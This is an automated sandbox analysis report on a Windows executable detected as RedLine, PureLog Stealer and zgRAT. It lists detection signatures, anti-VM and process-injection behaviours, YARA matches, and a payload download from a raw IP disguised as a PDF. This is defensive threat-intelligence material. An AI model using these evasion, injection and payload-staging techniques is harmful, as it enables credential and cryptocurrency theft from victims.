Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
justleadership.exe

Overview

General Information

Sample name:justleadership.exe
Analysis ID:1534477
MD5:d84496a9a986a9425b66d64560d8f1e1
SHA1:fc41adcfe2cbbaafd65e1a7b817c8dbc3d1c3585
SHA256:e92953ea4524720f25dab095abcfea67bb3df1b26d4bec4c2c7084fc48d0e362
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Downloads files with wrong headers with respect to MIME Content-Type
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • justleadership.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\justleadership.exe" MD5: D84496A9A986A9425B66D64560D8F1E1)
    • justleadership.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\justleadership.exe" MD5: D84496A9A986A9425B66D64560D8F1E1)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.2160604823.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: justleadership.exe PID: 6640JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.justleadership.exe.6ad0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              4.2.justleadership.exe.400000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                4.2.justleadership.exe.400000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  4.2.justleadership.exe.400000.0.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                  • 0x4526f:$s1: file:///
                  • 0x451cb:$s2: {11111-22222-10009-11112}
                  • 0x451ff:$s3: {11111-22222-50001-00000}
                  • 0x42394:$s4: get_Module
                  • 0x3ca6d:$s5: Reverse
                  • 0x3d715:$s6: BlockCopy
                  • 0x3c9b4:$s7: ReadByte
                  • 0x45281:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                  0.2.justleadership.exe.437dc50.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                    Click to see the 5 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: justleadership.exeAvira: detected
                    Multi AV Scanner detection for submitted file
                    Source: justleadership.exeReversingLabs: Detection: 60%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for sample
                    Source: justleadership.exeJoe Sandbox ML: detected
                    Source: justleadership.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: justleadership.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06B6CAFEh0_2_06B6CA80
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06B6D3C5h0_2_06B6D1F8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06B6CAFEh0_2_06B6CA70
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06B6D3C5h0_2_06B6D1EA
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06D3FA8Fh0_2_06D3FA19
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06D3FA8Fh0_2_06D3FA28
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4x nop then jmp 06D3FA8Fh0_2_06D3FB87

                    Networking

                    barindex
                    Downloads files with wrong headers with respect to MIME Content-Type
                    Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 20:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 09 Oct 2024 11:25:43 GMT ETag: "108410-6240983b13bc0" Accept-Ranges: bytes Content-Length: 1082384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: e8 58 54 3c 39 43 b0 fe ff ae ba fd dc 22 1e 8f af ab ea 4f 3f 50 90 03 e7 45 0a a8 7a ea 96 7f cd 54 a4 d8 2a a7 fe e4 c5 f2 5b 6a e7 d3 6c 2a 4c d5 71 f7 6e 31 c3 3d 31 f1 0f 50 5f 9a 2f e8 2d 89 d1 ae d6 6b 98 2b e8 f8 21 c1 e4 e0 2b a3 11 f1 3b d1 76 33 8e 75 87 2e d7 0e 39 68 a6 e4 16 c9 90 8a 5d 0b 7b 54 85 55 49 54 b0 8a b1 ec 4e 9d 2a 87 6c 14 fb 09 c9 71 0f 6b 3e f3 bc 4f f7 02 84 c0 7e 44 f5 d0 74 af 89 b0 51 55 c3 3c 9d 7d e5 62 23 47 51 05 31 3a d7 e8 e3 ce 55 18 3a fe bf 68 aa 93 21 e6 99 2d c9 30 98 18 6f 73 42 7f 81 e7 38 fa 40 44 16 1c 5a 97 05 44 59 ac 52 04 42 8a ff 27 1f 1e 51 8e ce 24 66 5f ce 9f f3 5a f0 51 a5 49 1e b0 dd b9 32 89 92 72 e3 40 c6 b8 66 cd ac 25 3c 74 06 14 91 92 48 15 22 f7 56 88 79 6e d7 aa 5d 40 4a ab da 43 35 0d 19 2b f0 e9 cc 99 28 6d 1c 37 b9 f1 49 82 e6 3a 07 2e ba 87 fc e2 14 be 59 cd 43 75 9d 2a c9 97 b4 3b 8e da 4e 81 ab 5e c8 4c 92 dd 4b f7 bb 84 4a d6 76 52 00 81 ec d3 c0 da 14 7f 45 b8 19 ac 1b 6b c6 5d 5c c3 e1 bc dc 8c 25 f8 9e e2 53 40 08 09 81 f2 d8 db cf 45 62 c2 5b 98 5d 0e 0a 69 85 79 df 34 7b 50 3f 10 2c e5 40 4a bd eb ac 4b a3 ed 88 48 51 d6 aa 56 57 8b 5c 5e 02 a5 3e 79 71 4c ae 15 e9 20 0f 99 55 1e 01 33 34 e0 25 52 46 b3 90 be 7c 85 20 b4 0a 46 fd f6 12 d8 3a 38 2f a1 e7 82 05 6a 09 42 37 39 81 2d 12 f9 88 81 3b 48 31 38 b9 ff 1d 35 22 63 de a3 a7 9b 44 5a 27 7e 09 e0 1a c8 89 22 4a fa f5 f5 d4 48 3e a3 ac a0 82 8a 37 ef 39 18 19 a3 6b 5c e3 6f f3 24 39 d5 c8 56 24 ec 7d e2 a5 82 98 5f ce 06 0f 1e 1f 69 01 32 9e 12 2b 98 7e 21 f7 77 0a 9d e6 81 53 ec f7 ea 86 69 ab 5e de db 45 06 8f a8 95 83 5b b6 7f 5d f1 ae 3b 4f 5e 37 18 28 91 70 75 fe 3d cd ef 88 5f 35 2f e9 31 a3 16 89 40 32 cf d3 80 6d 30 b1 64 7a 57 de f1 17 92 18 5a 38 6c 30 1c eb 34 94 ca c6 f8 2e d2 a3 7d 8e e6 aa 7c 9c 5c 09 44 f1 01 d6 b4 aa 2b a5 9d c5 fb 14 bb 70 22 95 f5 9c 6d 9d 39 f2 43 97 d6 60 20 b5 cf 68 a6 e9 94 8d 9f f4 4c 71 32 5f 4d b0 1e e6 16 49 5d 40 25 e1 6a b6 08 9d c7 cf 52 3a 08 2b 0e 20 69 a5 51 30 75 8b 80 be 71 cb 06 e0 34 6b 00 34 7c 53 94 0e 85 87 57 e5 ed 23 4b 0f 65 de b3 07 f4 ba 31 57 c2 6a 00 68 e0 ed 5b eb bd 09 45 a6 48 f9 77 8b 8b 65 b9 39 30 75 ef 45 dd a1 73 6e 93 5a 20 21 9d 8e fa 77 2f 75 06 03 ce a3 b6 52 60 ec 39 69 6a bf b4 02 63 92 58 fe a2 18 06 f1 9f e7 1b 17 f4 8d f5 09 19 c1 fb 7c 73 4b 72 b7 97 44 6d a3 e1 9a 1c d9 03 f4 b2 69 3d 11 3b 84 70 92 98 74 33 a1 82 83 6b 08 95 06 fa aa eb 8f bb 83 e8 3d 1c 81 4a ae 93 7c d2 44 7d 0d ea b7 da 9a 4b 27 f4 5f 65 d8 64 09 f1 f5 ef 0a a6 4b 6c 0d 56 80 12 2b c6 df 12 95 76 21 c4 7d 69 2c d8 7f 18 13 d7 99 52 4d 9f ad a2 ad a2 48 6f 71 03 4a 16 cc 3a dc 86 78 26 fc 08 99 66 3c 33 e0 f3 3e f7 c9 06 a5 6c c2 fe d6 e3 15 89 ab af b7 24 09 99 0a d1 04 67 3
                    Source: global trafficHTTP traffic detected: GET /mime/Fwkbz.pdf HTTP/1.1Host: 91.208.206.5Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.5
                    Source: global trafficHTTP traffic detected: GET /mime/Fwkbz.pdf HTTP/1.1Host: 91.208.206.5Connection: Keep-Alive
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,kq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.208.206.5
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.208.206.5/mime/Fwkbz.pdf
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: justleadership.exe, 00000004.00000002.2156474669.0000000006410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htms
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                    Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D38430 NtResumeThread,0_2_06D38430
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D37380 NtProtectVirtualMemory,0_2_06D37380
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D38428 NtResumeThread,0_2_06D38428
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D37379 NtProtectVirtualMemory,0_2_06D37379
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_0173F6B00_2_0173F6B0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_0173D6C40_2_0173D6C4
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_0173F6A20_2_0173F6A2
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A45F120_2_06A45F12
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4D2F00_2_06A4D2F0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A43BF00_2_06A43BF0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4730C0_2_06A4730C
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4A4400_2_06A4A440
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4A4500_2_06A4A450
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A43BE10_2_06A43BE1
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4CB480_2_06A4CB48
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A400070_2_06A40007
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A400400_2_06A40040
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A967B00_2_06A967B0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A9B6A00_2_06A9B6A0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A9B6930_2_06A9B693
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A967A10_2_06A967A1
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A9B0E80_2_06A9B0E8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A9B0D90_2_06A9B0D9
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B6DCCD0_2_06B6DCCD
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B6E3D00_2_06B6E3D0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B698B80_2_06B698B8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B800400_2_06B80040
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B881C80_2_06B881C8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B8C1210_2_06B8C121
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B8D7380_2_06B8D738
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B8C4570_2_06B8C457
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B800060_2_06B80006
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B881B80_2_06B881B8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B88C330_2_06B88C33
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B888450_2_06B88845
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06C000400_2_06C00040
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06C000340_2_06C00034
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D31E880_2_06D31E88
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D34FB00_2_06D34FB0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D3D2E00_2_06D3D2E0
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D3CA100_2_06D3CA10
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D343100_2_06D34310
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D3C6C80_2_06D3C6C8
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D31E780_2_06D31E78
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D343000_2_06D34300
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D339110_2_06D33911
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06D339200_2_06D33920
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06E8CE480_2_06E8CE48
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06E700400_2_06E70040
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06E700060_2_06E70006
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4_2_018A77404_2_018A7740
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4_2_018A748B4_2_018A748B
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 4_2_018A74984_2_018A7498
